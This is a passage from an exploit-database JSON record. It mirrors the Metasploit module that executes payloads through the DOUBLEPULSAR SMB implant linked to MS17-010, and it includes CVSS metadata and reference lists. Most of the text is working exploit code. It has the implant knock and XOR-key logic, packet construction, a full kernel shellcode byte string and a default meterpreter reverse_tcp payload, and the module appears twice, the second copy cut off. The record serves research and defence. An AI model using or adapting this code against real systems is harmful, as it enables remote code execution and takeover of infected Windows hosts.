def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-16] #"}, "lastseen": "2021-10-15T22:18:06", "differentElements": ["sourceData"], "edition": 46}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e17b1ad1afa525844612d4d51a95679d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-16T22:17:06", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-15T22:18:06", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-15T22:18:06", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to 